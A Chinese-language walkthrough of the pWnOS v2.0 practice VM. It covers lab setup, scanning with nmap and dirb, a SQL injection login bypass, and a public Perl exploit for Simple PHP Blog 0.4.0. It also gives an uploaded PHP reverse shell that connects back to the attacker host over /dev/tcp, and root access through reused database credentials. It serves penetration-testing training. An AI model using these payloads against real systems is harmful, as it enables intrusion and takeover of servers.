pWnOS v2.0

环境搭建

1.编辑虚拟网络编辑器

将VMnet1网卡“仅主机模式”的子网ip和子网掩码进行更改

2.将靶机的网络设置改为仅主机模式

3.kali也需要更改网卡，改为仅主机的连接方式

可以直接使用以下命令进行更改

ifconfig eth0 10.10.10.128 netmask 255.255.255.0

网络编辑器也需要更改

一、主机发现

arp-scan -l


得知靶机ip为10.10.10.100

二、端口扫描、目录遍历、指纹识别

2.1端口扫描

nmap 10.10.10.100

进行UDP扫描

nmap -sU -p- --min-rate 10000 10.10.10.100

发现无UDP端口

2.2目录遍历

dirb 10.10.10.100

发现很多敏感路径，可以在浏览器中进行访问，继续进行信息收集

可以知道中间件的版本是2.2.17

2.3指纹识别

nmap 10.10.10.100 -sV -sC -O --version-all

三、反弹shell

3.1web页面登录框sql注入

发现web页面存在登陆框

可以尝试进行sql注入

1'
123456

发现页面报错

页面存在sql注入，尝试使用万能密码登陆admin

admin' or 1=1#
123456

得到了邮箱信息

3.2找到新页面，进行漏洞利用反弹shell

打开dirb扫描的敏感目录，发现出现了新页面

看着是cms系统，可以先用whatweb扫描一下

whatweb 10.10.10.100/blog

没发现很有用的信息，右键查看源码看看有无信息

发现版本为Simple PHP Blog 0.4.0

去kali里面搜索历史漏洞

searchsploit Simple PHP Blog 0.4.0

最后一个要用到msf，我们尝试倒数第二个脚本

首先将脚本复制到桌面上

searchsploit -m 1191.pl 

然后查看该脚本的利用方法

可以看到-e的第三个参数是创建一个新用户

根据脚本的使用方法，利用该脚本

perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P 123456

脚本若报错，是因为依赖没有安装

sudo apt install libswitch-perl（需要改为nat或者桥接模式进行安装）

成功上传！

直接使用自定义的账号和密码进行登陆

发现管理员可以上传文件

在本地创建文件命名为2.php，2.php中的内容如下：

<?php system("bash -c 'sh -i &>/dev/tcp/10.10.10.128/4444 0>&1'"); ?>（上传php的反弹shell脚本）

根据dirb枚举的目录，我们可以找到文件上传的位置: http://10.10.10.100/blog/images

先在kali中开启4444端口的监听，再访问2.php文件

成功反弹shell！

四、提权

发现靶机有python，可以创建一个交互式终端

python -c 'import pty; pty.spawn("/bin/bash")'

靶机信息收集

uname -a
lsb_release -a

在靶机中找到了数据库的连接文件

尝试ssh登陆root

成功提权！